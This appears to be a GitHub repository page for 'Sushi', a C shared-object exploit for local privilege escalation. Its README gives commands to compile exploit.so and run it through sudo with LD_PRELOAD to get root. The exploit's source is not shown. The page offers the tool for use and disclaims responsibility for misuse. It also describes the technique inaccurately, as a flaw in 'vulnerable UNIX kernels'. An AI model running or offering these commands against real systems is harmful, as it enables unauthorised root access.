Skip to content
/ Sushi Public

Sushi すし, a shared object written in C language to perform LPE (Local Privilege Escalation) within vulnerable UNIX kernels using the LD_PRELOAD check. I'M NOT RESPONSIBLE FOR ANY MISUSE OF THIS PROGRAM, USE AT YOUR OWN RISK.

License

Notifications You must be signed in to change notification settings

not1cyyy/Sushi

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Sushi

Sushi すし, a shared object written in C language to perform LPE (Local Privilege Escalation) within vulnerable UNIX kernels using the LD_PRELOAD check

Compile and run

  • Use the following command to create the shared object: gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles
  • Now use this shared object as a value for LD_PRELOAD and get root privileges: sudo LD_PRELOAD=/home/exploit.so find

DISCLAIMER

I'M NOT RESPONSIBLE FOR ANY MISUSE OF THIS PROGRAM, USE AT YOUR OWN RISK.

About

Sushi すし, a shared object written in C language to perform LPE (Local Privilege Escalation) within vulnerable UNIX kernels using the LD_PRELOAD check. I'M NOT RESPONSIBLE FOR ANY MISUSE OF THIS PROGRAM, USE AT YOUR OWN RISK.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages